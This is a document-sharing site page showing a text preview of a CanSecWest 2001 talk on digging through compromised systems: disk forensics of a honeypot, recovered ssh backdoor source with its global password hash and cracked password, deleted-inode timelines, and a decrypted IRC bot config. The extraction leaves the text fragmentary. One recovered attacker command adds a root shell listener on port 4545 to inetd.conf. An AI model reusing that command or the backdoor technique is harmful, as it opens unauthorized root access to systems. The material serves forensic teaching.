欢迎来到麦多课文档分享! | 帮助中心 海量文档,免费浏览,给你所需,享你所想!
麦多课文档分享
全部分类
  • 标准规范>
  • 教学课件>
  • 考试资料>
  • 办公文档>
  • 学术论文>
  • 行业资料>
  • 易语言源码>
  • ImageVerifierCode 换一换
    首页 麦多课文档分享 > 资源分类 > PPT文档下载
    分享到微信 分享到微博 分享到QQ空间

    CanSecWest '01.ppt

    • 资源ID:379292       资源大小:120KB        全文页数:41页
    • 资源格式: PPT        下载积分:2000积分
    快捷下载 游客一键下载
    账号登录下载
    微信登录下载
    二维码
    微信扫一扫登录
    下载资源需要2000积分(如需开发票,请勿充值!)
    邮箱/手机:
    温馨提示:
    如需开发票,请勿充值!快捷下载时,用户名和密码都是您填写的邮箱或者手机号,方便查询和重复下载(系统自动生成)。
    如需开发票,请勿充值!如填写123,账号就是123,密码也是123。
    支付方式: 支付宝扫码支付    微信扫码支付   
    验证码:   换一换

    加入VIP,交流精品资源
     
    账号:
    密码:
    验证码:   换一换
      忘记密码?
        
    友情提示
    2、PDF文件下载后,可能会被浏览器默认打开,此种情况可以点击浏览器菜单,保存网页到桌面,就可以正常下载了。
    3、本站不支持迅雷下载,请使用电脑自带的IE浏览器,或者360浏览器、谷歌浏览器下载即可。
    4、本站资源下载后的文档和图纸-无水印,预览文档经过压缩,下载后原文更清晰。
    5、试题试卷类文档,如果标题没有明确说明有答案则都视为没有答案,请知晓。

    CanSecWest '01.ppt

    1、Jump to first pageCanSecWest 01Digging Through Compromised Systems and Tracking IntrudersDave DittrichComputing unrm honeypot.hda$i.dd | strings | grep d33e8f1a6397c6 donehda1hda5# ./configure -enable-global=d33e8f1a6397c6d2efd9a2aae748eb02-enable-sshd-log=/usr/tmp/nap -cache-file=/./config.cache. .

    2、 . / “d33e8f1a6397c6d2efd9a2aae748eb02“;#define USE_GLOBAL_PASS “d33e8f1a6397c6d2efd9a2aae748eb02“ . . .echo “running $CONFIG_SHELL-/bin/sh ./configure-enable-sshd-log=/usr/tmp/nap -cache-file=/./config.cache. . .$ac_eAUSE_GLOBAL_PASS$ac_eBUSE_GLOBAL_PASS$ac_eC“d33e8f1a6397c6d2efd9a2aae748eb02“$ac_e

    3、Dd33e8f1a6397c6d2efd9a2aae748eb02hda6hda7hda8Jump to first pageDeleted i-node timestamp analysis# grave-robber -c /t -m -d . -o LINUX2# for i in 1 5 6 7 8 do ils honeypot.hda$i | ils2mac hda$i.ilsbody done# ls -l *body-rw-r-r- 1 root root 3484454 Feb 15 23:01 body-rw-r-r- 1 root root 207 Feb 17 14:4

    4、2 hda1.ilsbody-rw-r-r- 1 root root 179650 Feb 17 14:42 hda5.ilsbody-rw-r-r- 1 root root 207 Feb 17 14:42 hda6.ilsbody-rw-r-r- 1 root root 796 Feb 17 14:42 hda7.ilsbody-rw-r-r- 1 root root 12618 Feb 17 14:42 hda8.ilsbody# cat hda?.ilsbody body-deleted# cat body body-deleted body-full# mactime -p /t/e

    5、tc/passwd -g /t/etc/group -b body-full 11/06/2000 mactime.txtJump to first pageDeleted i-nodesAug 09 00 12:52:37 18698240 m -rw-r-r- 1010 users Nov 08 00 06:52:59 18698240 .a. -rw-r-r- 1010 users Nov 08 00 06:56:08 18698240 c -rw-r-r- 1010 users Jump to first pageRecovered source#ifdef USE_GLOBAL_PA

    6、SS/* Check if the “global“ password was entered */int check_global_passwd( unsigned char *pass )/* Paste here the output from md5sum -string=“Your_Password“ */ char md5passwd33=USE_GLOBAL_PASS;/ “3e3a378c63aa1e55e3e9ae9d2bdcd6a1“; struct MD5Context md;unsigned char md5buffer32; int i;/* Compute the

    7、response. */ MD5Init(MD5Update( MD5Final(md5buffer, for( i = 15; i = 0; i- ) md5bufferi*2+1 = (md5bufferi md5bufferi*2 = (md5bufferi 4) + 0;Jump to first pageConfirmation of backdoor password#define USE_GLOBAL_PASS “d33e8f1a6397c6d2efd9a2aae748eb02“# md5sum -string=tw1Lightz0ned33e8f1a6397c6d2efd9a2

    8、aae748eb02 “tw1Lightz0ne“Jump to first pageCommand line in swap spacerootapollo linux# ./dd bs=1024 DEEFFGG08049f10 bffff754 000028f8 4d5f4d53 72204e4f 65757165 66207473 6820726f 6e74736f 20656d61 746e6f63 696e6961 2720676e 203a272f 000000000000000000000000000000000000000. . .F* FF+, NV1/bin/sh -c e

    9、cho 4545 stream tcp nowait root /bin/sh sh -i /etc/inetd.conf;killall -HUP inetdNov 8 04:02:00 apollo anacron2159: Updated timestamp for job cron.daily Techniques by Wietse Venema and Peter KosinarJump to first pageContents of IRC bot config file# tPACK.tcl coded by T0R0 - - www.falcon- #set homech

    10、an “#tpack“set admin “TORO X-cess“set vers “2.3“set altnick “$nick-“set username “$nick“set realname “www.$“set userfile “.log.yesterday“set channel-file “.log.today“. . .proc dcc_flags handle idx arg set a lindex $arg 0 set z decrypt xx3fw3 bijph.s5f7N0if $handle = $z set p “decrypt f3qcadr3 DtVgR.

    11、E/mLu1“if $a = $p if !validuser $z adduser $z *!*torowill.fuck.for.an.o-line.st chpass $z temp123 . . .Jump to first pageDecryption (part 1)egg.log6692 set z decrypt xx3fw3 bijph.s5f7N0 TORO6694 set p “decrypt f3qcadr3 DtVgR.E/mLu1“ die06769 set p “decrypt aSp81yAFiA/oyjc iU3CW.7pnwu/“ reset07116 de

    12、crypt clFua/ACQSB1aDZNz182aru0R0cJ1/8kzBZ/ 9xC15/VBEut1 decrypt 6iI5s1U/0kj0ux9EJ.VDFeS0 EPffD1HbaPj. decrypt X7EnV1qJu9J/sUhVd0C5mZM. ftxIp0RBYWq. decrypt uutWQ0VGi8k0rF0xV1lTiK5. XLnzYz0yt0 decrypt iys4f1DqXWm0FdGom/KfLuC1 qRt8A.4SMM20 bind chon - * on_dcc7328 set wmail “decrypt 65ty0hXeau/pk77x.dX 3AEfl/.23el/GowxN.aUrJT1“ Technique by Marco Walther


    注意事项

    本文(CanSecWest '01.ppt)为本站会员(hopesteam270)主动上传,麦多课文档分享仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知麦多课文档分享(点击联系客服),我们立即给予删除!




    关于我们 - 网站声明 - 网站地图 - 资源地图 - 友情链接 - 网站客服 - 联系我们

    copyright@ 2008-2019 麦多课文库(www.mydoc123.com)网站版权所有
    备案/许可证编号:苏ICP备17064731号-1 

    收起
    展开